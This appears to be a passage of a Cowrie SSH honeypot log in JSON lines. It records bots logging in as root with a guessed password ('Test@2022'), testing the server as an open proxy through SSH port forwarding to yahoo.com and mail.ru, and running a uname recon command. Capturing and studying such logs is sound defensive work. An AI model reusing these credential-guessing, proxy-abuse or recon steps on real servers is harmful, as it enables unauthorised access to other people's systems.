{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:51:44.296242Z","src_ip":"212.227.125.160","session":"5eaa601b498c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":21700,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21700","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.297682Z","session":"1a7ca0806217"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.348359Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":32481,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:32481","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.492945Z","session":"1a7ca0806217"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.543591Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.595083Z","src_ip":"77.83.207.83","session":"1a7ca0806217"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26049,"dst_ip":"1.2.3.4","dst_port":22,"session":"315b7c0ca0d0","protocol":"ssh","message":"New connection: 77.83.207.83:26049 (1.2.3.4:22) [session: 315b7c0ca0d0]","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.643800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.644731Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.694731Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.942904Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28453,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:28453","sensor":"my-vps","timestamp":"2025-08-31T03:51:44.993754Z","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.043841Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31040,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31040","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.184135Z","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.233992Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26177,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26177","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.376057Z","session":"315b7c0ca0d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.425853Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.476401Z","src_ip":"77.83.207.83","session":"315b7c0ca0d0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26143,"dst_ip":"1.2.3.4","dst_port":22,"session":"2716c61c8517","protocol":"ssh","message":"New connection: 77.83.207.83:26143 (1.2.3.4:22) [session: 2716c61c8517]","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.525453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.526273Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.576344Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.826916Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32273,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32273","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.877940Z","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:45.928899Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":20994,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:20994","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.072713Z","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.123260Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":30889,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:30889","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.264690Z","session":"2716c61c8517"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.315032Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.366055Z","src_ip":"77.83.207.83","session":"2716c61c8517"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26250,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3b372fbac37","protocol":"ssh","message":"New connection: 77.83.207.83:26250 (1.2.3.4:22) [session: f3b372fbac37]","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.418549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.419261Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.472236Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:51:46.505092Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.505756Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.735168Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11664,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11664","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.789127Z","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.842051Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":7055,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:7055","sensor":"my-vps","timestamp":"2025-08-31T03:51:46.991116Z","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.043963Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":3781,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3781","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.191169Z","session":"f3b372fbac37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.243932Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.297220Z","src_ip":"77.83.207.83","session":"f3b372fbac37"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26382,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bede23d1eee","protocol":"ssh","message":"New connection: 77.83.207.83:26382 (1.2.3.4:22) [session: 8bede23d1eee]","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.346463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.347432Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.397304Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.646288Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29581,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29581","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.697065Z","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.747124Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29154,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:29154","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.888460Z","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:47.939354Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":12551,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12551","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.080714Z","session":"8bede23d1eee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.130945Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.181861Z","src_ip":"77.83.207.83","session":"8bede23d1eee"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":26479,"dst_ip":"1.2.3.4","dst_port":22,"session":"58b28921e638","protocol":"ssh","message":"New connection: 77.83.207.83:26479 (1.2.3.4:22) [session: 58b28921e638]","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.230244Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:48.240276Z","src_ip":"77.83.207.83","session":"58b28921e638"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes2